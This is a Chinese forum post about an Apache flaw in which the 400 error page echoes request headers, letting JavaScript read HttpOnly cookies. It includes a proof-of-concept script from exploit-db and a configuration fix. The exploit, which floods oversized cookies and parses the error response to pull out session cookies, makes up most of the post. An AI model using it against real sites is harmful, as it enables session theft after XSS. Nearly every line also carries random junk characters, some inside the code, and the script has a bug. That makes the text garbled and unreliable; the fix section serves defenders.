很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。, s6 ?( T$ |* w A4 B# {9 \/ P4 s) g0 P
. k2 S" }( w$ V( ^用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
* E! q1 N+ o5 G: @3 g
4 z$ |- \. k7 }8 l# o7 h' I6 o; _2 u& g, f, j8 o
// http://www.exploit-db.com/exploits/18442/0 U W8 ]% `. s$ y2 N+ [. D) c
function setCookies (good) {
! e+ o& R+ j$ \// Construct string for cookie value* D5 f& @; V& p" I, Q) l5 R
var str = "";4 ]# ~& ?; t) W; h5 g3 C
for (var i=0; i< 819; i++) {1 S( c( t6 h+ p
str += "x";
& C2 m6 a3 U6 J} }1 L" t( @8 a
// Set cookies
1 B9 C; r3 y2 t |7 yfor (i = 0; i < 10; i++) {( W$ g; n9 w- D
// Expire evil cookie
; t: B( V* o3 \ d) I( s0 U2 ]if (good) {) N0 d$ Y; W6 y; G! _8 f0 y
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
8 g% P1 T, d8 \- T3 \( S}9 m# C. J* t2 j" g
// Set evil cookie0 U- A+ x. U. C1 q$ X4 \- j
else {
4 m4 g+ R3 ~8 r' X7 U _& m+ |var cookie = "xss"+i+"="+str+";path=/";
) n$ M# o+ `8 H) w( f2 @}+ s7 l* v1 i) @& s; L+ ?
document.cookie = cookie;9 Z9 Z- y( B. Z& b" a# {6 k
}2 L5 Z9 ]0 p' X$ b. E2 z& a
}
3 L5 M- X# |: S2 X$ e8 e" _function makeRequest() {
& X% J: z' C; ]. H" nsetCookies();& C; q9 U( W' u' b% s; p' T
function parseCookies () {
# \4 v% g0 B& q+ v# T1 N& svar cookie_dict = {};
; @' P {9 S$ q; s// Only react on 400 status
9 y8 {& ?' p0 H- {4 kif (xhr.readyState === 4 && xhr.status === 400) {
$ k% R' D6 H3 ~5 J// Replace newlines and match <pre> content
& [- K5 `7 B+ C: Z7 u2 T' Q; A K2 f( Uvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);! Z8 u: H, f+ M' L" R
if (content.length) {3 g, x) D3 u% e/ l* k. m) V- |0 ^
// Remove Cookie: prefix* A/ W6 l: p& @; Z
content = content[1].replace("Cookie: ", "");
- x X3 w# Y6 S5 [ nvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
3 h% E( O# g/ Y& A$ V7 \( R// Add cookies to object
9 H3 b3 @9 C; s b9 jfor (var i=0; i<cookies.length; i++) {
# X+ R; ?* }: ]' w# ?. ^var s_c = cookies.split('=',2);
& s- J; T, M& l' ]cookie_dict[s_c[0]] = s_c[1];
' S. }' Q* D4 H+ e}* T9 a" h6 O' X% k
}
' l# N- Z& d; C, t* q2 w4 Q// Unset malicious cookies" I8 J$ P0 x7 | }( a. m o/ o" ^( r
setCookies(true);
. W& L/ V6 {" }alert(JSON.stringify(cookie_dict));+ R9 C2 R# o8 R1 ]0 |* Y
}) ?, |/ b! l6 \; B& L* Z) B
}
/ H# Z' K1 M/ l- ~2 m# K X _// Make XHR request
7 R, A- t: J+ f3 {* h1 |var xhr = new XMLHttpRequest();) H0 e9 b& {- n, z% _- w
xhr.onreadystatechange = parseCookies;2 q# i! _* e, W* W, U; }" t/ R
xhr.open("GET", "/", true);& _1 |1 P3 [& o3 q' Q a; b- l
xhr.send(null);
" i$ o e, p( u6 _}
+ y; M3 {" `. n3 y! AmakeRequest();
. U8 |) R6 ?1 I1 ~7 J: \( V3 \2 S4 a( U: e5 ~
你就能看见华丽丽的400错误包含着cookie信息。1 _' x( I3 V7 b2 Q( E
- }0 T/ \2 |) X( |) |- Y# Y下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
# T( `% n. m% _4 J9 k6 ^, T! B9 q; N4 Z3 a/ T2 o: b. [7 J
修复方案:
8 D5 r+ B- I+ g4 w
( e8 b* P2 j- Y$ n2 o! v% Z: wApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
3 R0 R5 q* j* X/ @- g: Y2 ~: }& ^9 A' v
In the event of a problem or error, Apachecan be configured to do one of four things,- x7 I6 v9 j! r5 n1 P# D
8 X: T( w% T) C( O! A4 ~1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
p) r* Y7 P; y# V. @ v2. output acustomized message输出一段信息! d" Q. r8 H- x1 Z# h# m5 F
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 ! I9 Y3 J0 Z, h
4. redirect to an external URL to handle theproblem/error转向一个外部URL
- C- t4 G( k) V: c9 n% ^" p& O" ~
% o# Y8 ~* }9 P) J经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
6 t- B& a/ b2 s6 X6 v, o2 _
) V5 v1 ]0 s' t- EApache配置:, P0 a! F% I* b" S6 u
) E7 v. K v/ B U
ErrorDocument400 " security test"
+ [5 U, A2 s* S+ O( b; T3 `2 b5 t4 f
当然,升级apache到最新也可:)。
2 p* H8 w$ X) s* E$ n8 \+ w
1 `& A3 g8 v% p参考:http://httpd.apache.org/security/vulnerabilities_22.html# z# r. Y/ d4 U' H. I% [& U
6 V4 T+ \# B4 ]$ n) z2 O |
发表于 2013-4-19 19:15:43
收藏
支持
反对